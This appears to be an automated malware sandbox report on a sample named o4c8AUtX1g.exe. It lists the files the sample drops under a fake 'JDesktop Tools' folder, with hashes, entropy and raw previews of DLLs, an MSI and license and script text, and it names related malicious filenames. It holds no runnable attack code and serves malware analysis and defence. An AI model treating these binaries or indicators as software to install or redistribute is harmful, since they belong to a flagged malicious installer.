Joe Sandbox View:	Filename: e6d90883fd0e3c7576c140d6f12e04e1e54c3789ec4b2.exe, Detection: malicious, Browse Filename: tconnect_HCP_Software_v301_Installer.msi, Detection: malicious, Browse Filename: mWvxXYwvqU.exe, Detection: malicious, Browse Filename: farcry6_repack.exe, Detection: malicious, Browse Filename: yvY2AMOxwb.exe, Detection: malicious, Browse Filename: EpAIWOPmnA.exe, Detection: malicious, Browse Filename: EpAIWOPmnA.exe, Detection: malicious, Browse Filename: YSy9zYFtB2.exe, Detection: malicious, Browse Filename: WFrmiIfWt5.exe, Detection: malicious, Browse Filename: eAlTRSN46u.exe, Detection: malicious, Browse Filename: uhwBmJGGqo.exe, Detection: malicious, Browse Filename: fPPE8cHbql.exe, Detection: malicious, Browse Filename: qB6P2WfUjb.exe, Detection: malicious, Browse Filename: qB6P2WfUjb.exe, Detection: malicious, Browse Filename: xuXoY85NmR.exe, Detection: malicious, Browse Filename: DF7049B8C4D704376BE3920232B1BA6B2C8CF2FF0F9CF.exe, Detection: malicious, Browse Filename: DF7049B8C4D704376BE3920232B1BA6B2C8CF2FF0F9CF.exe, Detection: malicious, Browse Filename: 9c9cdb438163a2e64adcb398a6f1f1abcdc81c1cf35ab.exe, Detection: malicious, Browse Filename: zEQyeKgNgG.exe, Detection: malicious, Browse Filename: WP6TzYzWmG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E..2..a..a..a..=aa.an..`..an..`..an..`..a..a..an..`..an..`..an..`l.an.Qa..an..`..aRich..a........................PE..d...5..r.........." .....n...H......P.........................................4.....g.4...`A........................................p.0.L&....0.......2......@1...............4......F'.T....................*..(....................q..8...Tc0......................text...o........................... ..`.wpp_sf.Y........................... ..`.rdata...Z.......\...r..............@..@.data....A....0.......0.............@....pdata.......@1.......0.............@..@.didat........2......V2.............@....rsrc.........2......b2.............@..@.reloc........4......b4.............@..B................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	62088
Entropy (8bit):	5.87884188749315
Encrypted:	false
SSDEEP:	1536:0mzFpEBNMGwcQHanzzd2UE/8YVkEyDrKe2xDBoPnp:dFpEBNMGwcsa8f/8a6Pp
MD5:	5AEB79663EA837F8A7A98DC04674B37A
SHA1:	536C24EF0572354E922A8C4A09CF5350D8A6164D
SHA-256:	E13D9F958783595ACD8ACDBFF4D587BCA7E7B6A3AAB796E2EFBD65BD37431536
SHA-512:	25E4E48EC2162EA6342CFD823E789ED0B5A995BB61FA3FA68364D1EE2468974FA4E75C17EB2CB3DDB213E633136C9AAB139BBF32FB8688FF5B1ABF444E8BB652
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tx..........." ..0.................. ........... .......................@.......x....@.................................H...O....... .................... ......x...8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................\|.......H.......$b.............................................................v.~....}.....(.....r...p(.....r...p.r...p..{....Br...p(........."..(....&...(....:..o.....(....:........(....B..........(....&...(......(....F.(....s....( ...b.(....s....%.o!...( ...6.(.....( ...6..s....(....R..s....%.o!...(....&...( ...:...s....(....V...s....%.o!...(........("...>....s....(....^....s....%..o!...(....2......(#....s$..."..(%....0..........(.....(.........(...+..

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\CrashRpt License.txt Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1569
Entropy (8bit):	5.078244393355221
Encrypted:	false
SSDEEP:	48:rlXOOrpJAzJzGl0PE9432sEs32s3IEtd132RTHy:peOrpJAzJzGlBq3b38OSTS
MD5:	734B7CB601EA82D8B4A9926373323B06
SHA1:	37490788B803335FA3AAD761B3EA0010889B2D8D
SHA-256:	90F301E30B61CDF8AC5E29F4FDD0E81C535FCAABF06B48D36B110A3F35E5A3D2
SHA-512:	273F154273DEDF9B06BBA74AEB81BF905309B6F137A414310B1E96C218095CC6B49EE663932815D6771C9BE1D033B014F57E7AE72C7B7FD396A9C254FA124706
Malicious:	false
Preview:	Copyright (c) 2003, The CrashRpt Project Authors...All rights reserved.....Redistribution and use in source and binary forms, with or without modification, ..are permitted provided that the following conditions are met:.... * Redistributions of source code must retain the above copyright notice, this .. list of conditions and the following disclaimer..... * Redistributions in binary form must reproduce the above copyright notice, .. this list of conditions and the following disclaimer in the documentation .. and/or other materials provided with the distribution..... * Neither the name of the author nor the names of its contributors .. may be used to endorse or promote products derived from this software without .. specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY ..EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES ..OF MERCHANTABILITY AND FITNESS

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	940032
Entropy (8bit):	7.265468453378986
Encrypted:	false
SSDEEP:	12288:SjtToSCODTjAKMmNRYzUubi85LKHtToSCOD7jAK4mNRP:2Vxtqw/85LKHV1pt
MD5:	40C4EA80985E48C095D9F3AF80215C12
SHA1:	B7EAECB4CF5E45F7E3946BCD1C249A46428CA8C0
SHA-256:	2B1678502F69BCCBA816FE2901A12BD15567C4113D8EC5B0C9EBA3A1AEA7C633
SHA-512:	8C1FCFACEBA8273D4307FDC2AF0E8D137CF162838ED0C9AC198D0A29EC0E4E6B8A6B8C202BC415B2353889B4429ED9B07D784F367B2B339F65090242C78D64AA
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P...........!.....N...........l... ........... ..............................{g....@..................................l..S...................................Pk............................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................l......H.......x...............j...n..P .......................................{.Z.L&.$.......v....lk..AC4..{E.0..X.....?3!...^..Q@..L.{._wSIwnsb].E.D...H=.{.s/.....H.f.q.kn...O.1y.\e.A./.[D.:#..T.h..6...}......}.....s....}.....s....}.....(....J.s....}'....(......0..)........{-........(....t......\|-.....(...+...3.....0..)........{-........(....t......\|-.....(...+...3.....0..)........{.........(....t......\|......(...+...3.*....0..)........{.........(....t......\|......(...+.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	200704
Entropy (8bit):	5.683688089372797
Encrypted:	false
SSDEEP:	3072:hjMibqfQqFyGCDXiW9Pp/+Tl4abpuu201PB1BBXIDwtqSPVINrAfvp1:GibqI59PpOPf201/z7p
MD5:	C8164876B6F66616D68387443621510C
SHA1:	7A9DF9C25D49690B6A3C451607D311A866B131F4
SHA-256:	40B3D590F95191F3E33E5D00E534FA40F823D9B1BB2A9AFE05F139C4E0A3AF8D
SHA-512:	44A6ACCC70C312A16D0E533D3287E380997C5E5D610DBEAA14B2DBB5567F2C41253B895C9817ECD96C85D286795BBE6AB35FD2352FDDD9D191669A2FB0774BC4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.K...........!......... ......^.... ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\License.txt Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	Non-ISO extended-ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	4532
Entropy (8bit):	4.840297093762095
Encrypted:	false
SSDEEP:	96:D9moghaxhFkV9RGGQwGok+iOJ54d7JdEgUVVN7XzUKyeraku:knhIhmz8pJdLk/7XAKy7x
MD5:	54A36434CA791404E0EE1894A7FB257A
SHA1:	E99BA6366C22F9E4693F6317352EAA5854F0F429
SHA-256:	5FCC77BA8A6D6DCA5ECD466F7706133A17571EAAA1B45D4613E2BF5C58DEC678
SHA-512:	87942ABBE3BC1C87BB77323D4E43D63A30ACE3B569FF16363D871B77A306A64569A8655B0B3A526B31F901BA5F081BFE122B7DF7F0C491637DD3050EC948D071
Malicious:	false
Preview:	MyBusinessCatalog Platinum....Copyright: (c)2002-2021 Alexander Chulpanov..Homepage: http://www.MyBusinessCatalog.com..E-mail: info@MyBusinessCatalog.com..==============================================......You should carefully read the following terms and..conditions before using this software.......MyBusinessCatalog is try-before-buy software. This means:....1. All copyrights to MyBusinessCatalog are exclusively owned by the author . Alexander Chulpanov.....2.1 You can use the FREE version of MyBusinessCatalog with restrictions applicable to unregistered version...The DEMO (free) version allows outputs 50 items (to PDF, Printer etc)..Trial periad - 30 days...If a Mobiliger subscription is already active, the trial period for..MyBusinessCatalog Free is automatically extended.....2.2 Registered version...MyBusinessCatalog Platinum - PDF Studio License...Allows creating PDF and Printable catalogs...Small Business License includes 1 (one) year of free software updates.....MyBusin

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16968
Entropy (8bit):	6.369067823836705
Encrypted:	false
SSDEEP:	384:YdX0XY0X+DeljFWt6O9QHRN7fhKtklxHQJ:YdXuhvU8ZOJ
MD5:	FEC0A2AB4AB150DAD477E0D4885637CE
SHA1:	5A3C8920DE1B3F2F7867A20D05C94DE5B2779B81
SHA-256:	746760FE317B9721FB761209F0F9F7E1A5126390970AAC5FD93F11504FFE3D30
SHA-512:	11C7C941D31902CCC9F9E07166CF6E181E0ADF7BAEA0986B863CEFD71591431C0D630018B5514C66D6670BFAD1F8ACD363AC19BED486FB92B06DE83A4669C7A0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(..........." ..0.............>.... ...@....... ..............................+.....`..................................-..O....@..................H$...`.......,..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......P .. ...................p,......................................BSJB............v4.0.30319......l...(...#~..........#Strings............#US.........#GUID...........#Blob...........G..........3......................................................................b...+.b.....O.........&.l.......................?....\..................................[.............................................<...................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24200
Entropy (8bit):	6.286319408230414
Encrypted:	false
SSDEEP:	384:PecpB4zReJOVOm9FziUm0exVSiIgm19J8AG4oHHith5kCCeYghu+:3DgeO97m0exVfKwxniQghu+
MD5:	EDCEB39D12707299F6501AE9472A2FD1
SHA1:	F4BE70378AF9FEA7355307CF66E0F5A50590E974
SHA-256:	FA2C262A94F90DAD052A6A5D190F347CD1B8D8BACD7417B8B3FFF56F7D42ECB4
SHA-512:	08406BEDE6C980A1C36EC427C1D86F05F11A41EC366F3821D7B229649B10F3AF9D37AFE7A5A55C7D32D90F0B7D0A43848AF3B20DEA2D2D3669130AAA08729BD2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..U...........!.....:...........X... ...`....... ...............................x....@..................................X..W....`...............B..............\W............................................... ............... ..H............text....8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............@..............@..B.................X......H.......$-..8..................P ......................................\7..4...tTh......A_RF...+X.P.k........_.'....R\|RY.r..d.(...._..h4....sN.:..QU.e...RY..%........(.Y.Kf6.7.w...T..(;._\|n....{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....*

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	35016
Entropy (8bit):	6.54246973766738
Encrypted:	false
SSDEEP:	384:WL0xHprBefGMOrRQY+hoZhOZkcvr3Eql38WqATrOhEZ0GftpBj1x+ILKHRN7c6lE:NRBefGBkoWjvr0VabKirxmcM+
MD5:	85F6F590B5C4B8C7253E9C403C9BE607
SHA1:	D5A9DB942A50C8821BACD7F6030202C57EC4708B
SHA-256:	D20552FD5C8C8C9759608A84DB1E216DA738F5E9F46DE9E8A3F39A0D6265CB8B
SHA-512:	9C78CB444E28618D44E9DEB23571FC7BBCE268882C2803E0CCC0E84B3E6EAB89C6AF2AAC0D81EF0D2C9FD1E9611CB35334EF3304FB16C5BA0481F6A7273C3660
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.T...........!.....@..........._... ...`....... ....................................`.................................\_..O....`...............J...>..........$^............................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................._......H.......h..../..................P .......................................#..ON.... "J.0..r....6RbR[..44....F.....E.X....1.XIE...:....5.M...Txn.\rycn.....o\|.V}...l}.1En...`.T. \(e .u..=.nA...@p:.(......}....R..r...p.(.....(...+N..r...p.(....(...+R..r...p.(.....(...+Z...r...p.(......(...+Z...r...p.(......(...+..0..$...........(...+..-...........o...........0..............(...+..-.s....z.o.......0..............(...+..-.s....z.o.......0..............(...+..-..*.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem4.js Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18727
Entropy (8bit):	5.228912164616093
Encrypted:	false
SSDEEP:	384:vADBz8NWcg8Yt0Mp9sXYGb0JPMfBH1FBIpz4vl:vADBz8NWcg8Y2Mp9sXlb0OfBH1F+pz4t
MD5:	E001FBA3F73ADB83B5B9DCD2A32F1C7B
SHA1:	D0B3A5615F30226072BA90A961DBAD1CE0ED23E2
SHA-256:	60A987CFE5AE817D5D5ED82E1F39C3C537321EE9AB9A0B902DB2990F66B99887
SHA-512:	6DF77E4AC29B0AF120C2EE9380BACD4D1E02C08E9F6E7CD293959F7438294182B773B3C75E0DED111C3EEFD511B09FDF2F43927D68884572F745464705EE81A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2009 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 4.6../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "4.6";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.converterCodeExists = currencySystem_converterCodeExists;...this.converterCodeIsUsed = currencySystem_converterCodeIsUsed;...this.converterUnusedCode = currenc

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem5.js Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	18850
Entropy (8bit):	5.252718939622608
Encrypted:	false
SSDEEP:	192:LVJMqzg8F9zp/OQMhEF7IXs1NmrgfTPzD5bL29h1FDiTYyf1CQx/TuTmkk6aez4U:LV2Ig8FanXcmrgfTlwOH1ltsz4v8
MD5:	866B6E8A186BE6005A140CFE9F578CD8
SHA1:	E0B2E5344097EF4C1C0A8BE851C5DE27C7F490DB
SHA-256:	0A5731729919FEDC1A3B81C651087AB200C9470FA75A89BEBEA73AE0478F30E5
SHA-512:	BE84B6A9B893DC0D66113287942A388BAFB0629AE67E6C02A8E09E98A028D50CCFA082A2C1B5BFAFA273ACF9E6338E961FA208B62EF6BEE43D8BFD5E6D4619A9
Malicious:	false
Preview:	/...Copyright (C) 1998-2012 Currency System, Inc. All rights reserved....$VER: Currency System Script Library 5.2../....// Currency object constructor..//..function Currency(code, nameS, nameST, symbol, rateEUR, smallestUnit, regime, physical, legalTender, popularity)..{...this.code = code;...this.nameS = nameS; // singular...this.nameST = nameST; // singular titlestyle...this.symbol = symbol;...this.rateEUR = rateEUR;...this.smallestUnit = smallestUnit;...this.regime = regime;...this.physical = physical;...this.legalTender = legalTender;...this.popularity = popularity;..}....// CurrencySystem object constructor..//..function CurrencySystem()..{...this.version = "5.1";...this.initialized = 0;...//...this.initialize = currencySystem_initialize; // object.method=function(){} syntax not supported in Netscape Navigator 3...this.widgetCurrencyIsListed = currencySystem_widgetCurrencyIsListed;...this.widgetCurrencyIsUsed = currencySystem_widgetCurrencyIsUsed;...this.widgetSuggestUnusedCu

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\currencysystem5.json Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	635
Entropy (8bit):	4.968896753287593
Encrypted:	false
SSDEEP:	12:G3in27KkdcynYKFfaYKQItIl7eTaYKRHTaYKQItI9txrZOaYKB3i8T:G3i27KkdvYKtaYK3qteTaYKRHTaYK3qz
MD5:	D5BE63A1E66E4D6597F49BFD15EB3D83
SHA1:	6B0D0E3101EDB0C92C14691745765DE49CDB7C01
SHA-256:	A1CF701C876F916AACB12A3B952D1D2A38889C2AC118AF9D89493F0A86A45C5D
SHA-512:	6F8CD8F4D18D978F9B30E00322E3CC020B1C3ADD6B6307ED96EBB47B422DD15DDE4BB82698AE755CEF57F8BA3B1BDBD6F47D83CF08471E7B131B8CF8B20ACA55
Malicious:	false
Preview:	{...<currencysystem-insert-header>....."embedLicense": "This service is free to use as long as the banner and link appear on all pages using it. See the Attribution information at currencysystem.com.",..."embedSmallBannerGfx": "https://currencysystem.com/gfx/pub/script-button-88x31.png",..."embedSmallBannerText": "Powered by Currrency System",..."embedSmallBannerLink": "https://currencysystem.com",....."embedSmallHomeGfx": "https://currencysystem.com/gfx/pub/script-icon-16x16.png",..."embedSmallHomeText": "Currrency System Homepage",..."embedSmallHomeLink": "https://currencysystem.com",.....<currencysystem-insert-currencies>..}

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Templates\ecb-eurofxref-daily.xml Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.022779704233175
Encrypted:	false
SSDEEP:	6:TMVBd/5Q3JLHAc4Mj/9mc4C7drcDqhsDgLHLvvssw92PXCEZqilvs/BRi8LqfaR/:TMHduFHjFbdrcDWPu2XCMei8Lqai8L/
MD5:	376F44C2269588374F0F7E876BB3CFFA
SHA1:	1241AC750F7CA447D7A74EB516838C39516AA841
SHA-256:	3B96E197B1A47E7A391385638E13A0CF42E04E1665470A89EABECC67D1B91323
SHA-512:	744C894429453B5E40241FEA6A2EBD354BF2B06C5AD9B4439BE1CCACD15B89C487A1FE100851F23E7A2212CCAC600FC8519224855D7AC72F09E6AABD1E8AC6C9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<gesmes:Envelope xmlns:gesmes="http://www.gesmes.org/xml/2002-08-01" xmlns="http://www.ecb.int/vocabulary/2002-08-01/eurofxref">..<gesmes:subject>Reference rates</gesmes:subject>..<gesmes:Sender>...<gesmes:name>European Central Bank</gesmes:name>..</gesmes:Sender>..<Cube>... currencysystem-insert-->... /currencysystem-insert-->..</Cube>.</gesmes:Envelope>.

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {D9FF1A35-78F9-49F0-A6A0-DB3A11387835}, Number of Words: 8, Subject: JDesktop Tools, Author: JDesktop Integration Components (JDIC) Project, Name of Creating Application: Advanced Installer 18.7 build 0a7fdead, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Category:	dropped
Size (bytes):	2233856
Entropy (8bit):	6.540847260876917
Encrypted:	false
SSDEEP:	49152:TDs/YrEUl8VlvfqAE/fQhksQQNgXAo1sVzhly+PkfsJJ10FRzVT8ajBK+ByqV4Tq:GYrEkXAEfs01sVNrajM+
MD5:	9AFC8137B547561655D454AFF862E567
SHA1:	2DAB8B1B9F1AE612E9CD359207751B452C76CB0D
SHA-256:	86747F0567ADBDD895E23E25760AF726A87000BD01EBEF994352EFAD7EB3987C
SHA-512:	91B99B561FBD3C6F3C2583CBF13D9FAF31AAFE6EFDB82667F646AD9F245904D3EF8F37B4CD11E141ECBEBDB7724414E21C4A8F7886CE68FFAC7B0BB8B1B5383B
Malicious:	false
Preview:	......................>...................#...................................I.......v.......................................................................................................................\|...........................................................................................................................................................................................................................................................................................................................c...............%...8........................................................................................... ...!..."...#...$...0.../...'...(...)...*...+...,...-...........6...1...2...3...4...5...9...7...?...C...:...;...<...=...>...B...@...A...K...S...D...E...F...G...H...R.......K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\help.chm Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	325845
Entropy (8bit):	7.966997729785747
Encrypted:	false
SSDEEP:	6144:upVysoxdLmULS5Nv5czGT6ozCF6DWc4kYBDrHDDoicYs0meNdts:iAsWJmUSjBczf3c4dHDDoicYs0re
MD5:	DF113262CBB4AD90D0D889620BDEFB06
SHA1:	D94D2111F9FD566941FF96DBA6237D126591E512
SHA-256:	195BAFB549728E15B392B5A2FCBD41003D2472B1AD82AED449175C37E5834657
SHA-512:	B3DDFCCEFFDE24791DFB9587D5AEBC406B9EC3408B38D50C70AC324931C37FD7F55099C7F84B8359A76ACA1BB0E350977451639CC0E61241EBE16D6F4DB90976
Malicious:	false
Preview:	ITSF....`..........g.......\|.{.......".....\|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...5.../#ITBITS..../#IVB...Rd./#STRINGS...U.i./#SYSTEM....;./#TOPICS...5.p./#URLSTR...Y.\|./#URLTBL...%.4./#WINDOWS.....L./$FIftiMain...}..8./$OBJINST...>.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...:../$WWKeywordLinks/..../$WWKeywordLinks/Property...6. /about-how-create-a-catalog.html..{.z!/catalog-makers-context-menu.html..u.62/cd-catalog-creator-first-lanche-informations.html..+.[+/checkboxes-options-in-catalog-builder.html...x.../checkboxes_html_117d54ec.png...h.../checkboxes_html_m548d6b7e.png...m.X./checkboxes_html_m59955fe6.png..._.../checkboxes_html_m678cf8a3.png...E.2 /context_menu_html_m6108afb8.png...S.n,/create-order-from-enduser-cd-catalogue.html..A..,/create_a_catalog_related_products_user.html...x.~./how-use-cd-catalog.html

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54224
Entropy (8bit):	6.686697566242328
Encrypted:	false
SSDEEP:	1536:8n6iCEsBHqIXN0llUofqcOZkE5z7L/cLlvBQ+8iAYS:GuEsdXL/cLlGD1
MD5:	249D164D4361F1BBF827331A2C5B8E64
SHA1:	225AE2D2E277B817962D3A65666706BDF7AE6067
SHA-256:	492ADEB85D95834A97FC2C1BD61347202111A3773CE4DE35FC1597C52BE7AAB3
SHA-512:	16B656E17A305503A01C7429EC44DC9DED0DEC39F50844F5CAFF2484AF3F3551F11B620C63111361A5D333AA16A7DB0A2DC7FF5C895AA6C9252F21CA42223A17
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H.....s_..s_..s_..._..s_F.p^..s_F.v^..s_F.w^..s_F.r^..s_..r^..s_.i._..s_..r_a.s_..w^..s_..v^..s_..s^..s_..._..s_..._..s_..q^..s_Rich..s_........PE..L......Z...........!.....r...6.......r.............J................................"...................................................8................)..............T...............................@............................................text....p.......r.................. ..`.rdata...".......$...v..............@..@.data...............................@....rsrc...8...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.871255823719978
Encrypted:	false
SSDEEP:	98304:vdG+iN2k+e/VO+0X30DQHDbOXh9A0DESaHafv4UZDCr:A+Hk+eX0BHDbOXh9A0DeHfUZDS
MD5:	B6723B31F67956E747493BC64F2C7A59
SHA1:	72389ECF849BFDA364E84258E5857A3DF07E5BFC
SHA-256:	3361AC8727ABA86AC7F3AAC3A214C3CB76F1AF9FF7EE5E94C52C30FDCB7D5064
SHA-512:	E17FEA164BB00E65BE0E58771A728FC9CED5BD65AE2FEC9E55C5697E69A498404B6D52B529DF774012C9F1268D29D97AD3CAFD404BAD58B3C36535A52AB6E09B
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ...A...A...A...9N..A......A......A..4...A..4...A..4...A..4...A..h(...A..4...A...A..C..4...A..G4...A..G4"..A...AJ..A..G4...A..Rich.A..Rich...................PE..L...2.oa...........!.....87.........Py!......P7...............................L......DJ...@.........................P.E.D.....E.......G.H2....................I.,...........................@.B.......B.@............P7..............................text....77......87................. ..`.rdata.......P7......<7.............@..@.data.........F..b....E.............@....rsrc...H2....G..4...DG.............@..@.reloc..,.....I......xI.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll Download File
Process:	C:\Users\user\Desktop\o4c8AUtX1g.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1379352
Entropy (8bit):	6.864605291373112
Encrypted:	false
SSDEEP:	24576:Rcbj++KpP3xREx5Fvvr3WH9IYf0mF8wBpoJqzTi1QA96:Rrpi3r3WH9IYf+wBpoJqzTi1QA96
MD5:	7CC7637AB23A01396206E82EF45CDA0E
SHA1:	209CC6CE91E24383213F1C2456D43E48BD09B8C4
SHA-256:	E6C6568A2CD61E401DB4E4F317F139852502EEBB9FE1FBB9C92D7ECFA6524F7F
SHA-512:	E13C48D6CB7B2983221F00C3FDC5DA4221D6B0383F68D74BCAC2AAF95CC7AE702E65DA517AAD51AD7DAD0B672F8436532F4612E7F0853AE0CA924635F3983F6D
Malicious:	false
